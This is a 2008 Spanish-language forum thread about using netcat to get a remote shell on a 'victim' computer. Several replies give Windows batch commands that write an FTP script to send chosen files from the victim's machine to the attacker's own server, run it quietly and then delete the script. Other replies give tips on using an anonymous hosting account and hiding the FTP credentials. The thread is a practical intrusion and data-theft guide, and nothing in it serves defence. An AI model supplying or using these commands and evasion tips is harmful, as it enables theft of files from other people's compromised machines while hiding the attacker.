Jugando con netcat

pascal88 · 21 Abril 2008, 19:37 PM

Cita de: WHK en 23 Junio 2007, 23:43 PM

8. Por último presionas en "OK"

Ufff... ahora que ya configuramos nuestro servidor FTP podemos hacer las transferencias de archivos... ¿como?... facil mi querido watson...

Desde tu shell crearemos un texto que nos permitirá ejecutar los comandos del FTP.

echo o >> ftp.txt
echo mi_ip >> ftp.txt
echo user >> ftp.txt (Recuerda que lo vimos en el paso 1)
echo pass >> ftp.txt (esto también lo vimos en el paso 3)
echo GET archivo >> ftp.txt
echo quit >> ftp.txt

El comando GET significa que le subirás un archivo y el comando PUT es porque le sacarás un archivo para ponerlo en tu pc. Puedes aplicar mas de uno como por ejemplo:

Ahora ejecutamos el FTP desde mi shell de la siguiente manera: ftp.exe -s:ftp.txt y bualá!...

Justamente despues de hacer eso, me pone que hay un error desconocido.
Quiza no lo ponga donde es, donde se pone eso, en la shell donde salen los datos de la victima o en la mia? es que no se que puede pasar!!! ayuda pleaseeee!!

marlon_agz · 22 Abril 2008, 05:31 AM

aqui mismo

http://www.vulnwatch.org/netcat/nc111nt.zip

salu2

D4RIO · 22 Abril 2008, 05:46 AM

Mejor busca tutos sobre tcp/ip y transferencias de datos, y sockets... eso es lo que manejas desde nc, nada más, por eso lo usan los administradores de redes.

pascal88 · 22 Abril 2008, 20:23 PM

Hola, mirad, yo tengo un dominio de estos de iespana, entonces, digo, desde la shell de la victima, cojo y subo los archivos que quiera, y desde mi shell luego los veo.
Pero pasa una cosa, cuando pongo en la shell de la victima:

ftp 82.196...
(me pide usuario) y se lo pongo
pero sq, ahi se queda pensando un rato, y no sale nada, sq no me puedo conectar a mi servidor para subir algo, desde una shell remota??

Por favor, contestar!!

Gracias.

drzboii94 · 22 Abril 2008, 21:44 PM

no entiendo cual archivo es que tengo que anadir a .rrar

elmeister · 22 Abril 2008, 22:07 PM

Cita de: pascal88 en 22 Abril 2008, 20:23 PM
Hola, mirad, yo tengo un dominio de estos de iespana, entonces, digo, desde la shell de la victima, cojo y subo los archivos que quiera, y desde mi shell luego los veo.
Pero pasa una cosa, cuando pongo en la shell de la victima:

ftp 82.196...
(me pide usuario) y se lo pongo
pero sq, ahi se queda pensando un rato, y no sale nada, sq no me puedo conectar a mi servidor para subir algo, desde una shell remota??

Por favor, contestar!!

Gracias.

usa el código siguiente, donde pone script dejalo tal cual, es un archivo que crearás y despues borrarás

Código (dos) [Seleccionar]


echo usuario>>script
echo pass>>script
echo ascii>>script
echo put [PON AQUI LA RUTA DEL ARCHIVO QUE QUIERES SUBIR]>>script
echo bye>>script
start ftp -s:script [aqui la direccion del servidor al que vas a subir el archivo]>nul
del script

repite el proceso por cada archivo, o añade varias lineas de echo put [archivo]>>script antes del echo bye>>script

D4RIO · 22 Abril 2008, 22:16 PM

drzboii94:
Primero quemarse la cabeza y despues si preguntar... apuesto a que no leiste ni medio...sentate, perde una o dos horas en leer, y no nos hagas perder el tiempo a nosotros por vos: se menciono mil veces que es nc.exe, renombrado, cambiado, lo que quieras, de todas formas no es cosa de geeks... yo programo mis popias versiones.

pascal88:
Si usas un dominio en iespana con tus datoos te expones demasiado. yo uso una, pero anonima, entonces el es el que accede, y sube archivos por el ftp de iespana, y yo los descargo como si fuera un usuario comun... jeje. el tema es que encriptes bien el usuario y pass del ftp... no los vayas a incluir en el fuente o un dump bastaria para verlos...
a demas usa php para que la capacidad de bajar algunos archivos sea solo con un pass...xd
se creativo...

drzboii94 · 22 Abril 2008, 22:34 PM

Cita de: D4RIO en 22 Abril 2008, 22:16 PM
drzboii94:
Primero quemarse la cabeza y despues si preguntar... apuesto a que no leiste ni medio...sentate, perde una o dos horas en leer, y no nos hagas perder el tiempo a nosotros por vos: se menciono mil veces que es nc.exe, renombrado, cambiado, lo que quieras, de todas formas no es cosa de geeks... yo programo mis popias versiones.

pascal88:
Si usas un dominio en iespana con tus datoos te expones demasiado. yo uso una, pero anonima, entonces el es el que accede, y sube archivos por el ftp de iespana, y yo los descargo como si fuera un usuario comun... jeje. el tema es que encriptes bien el usuario y pass del ftp... no los vayas a incluir en el fuente o un dump bastaria para verlos...
a demas usa php para que la capacidad de bajar algunos archivos sea solo con un pass...xd
se creativo...

Lo ley entero pero lo que pasa es que mira lo que me sale despues que pongo

CitarNC -VV -L -P 80

pascal88 · 22 Abril 2008, 23:46 PM

Citar

usa el código siguiente, donde pone script dejalo tal cual, es un archivo que crearás y despues borrarás

Código (dos) [Seleccionar] Expandir
echo usuario>>script echo pass>>script echo ascii>>script echo put [PON AQUI LA RUTA DEL ARCHIVO QUE QUIERES SUBIR]>>script echo bye>>script start ftp -s:script [aqui la direccion del servidor al que vas a subir el archivo]>nul del script

repite el proceso por cada archivo, o añade varias lineas de echo put [archivo]>>script antes del echo bye>>script

perdona que sea tan pesao hombre, pero es que veras, desde la consola de mi pc pongo eso tal cual, es decir, en usuario y en pass no pongo mis datos, lo pongo igual que viene en tu post. y me sube el archivo!, pero desde la shell de la "victima" no lo sube tio! que hago?

Una ayudita porfavoooooo!!!
grasiasss

vladimir_levin · 23 Abril 2008, 21:48 PM

muy buen manual completisimo y chidisimo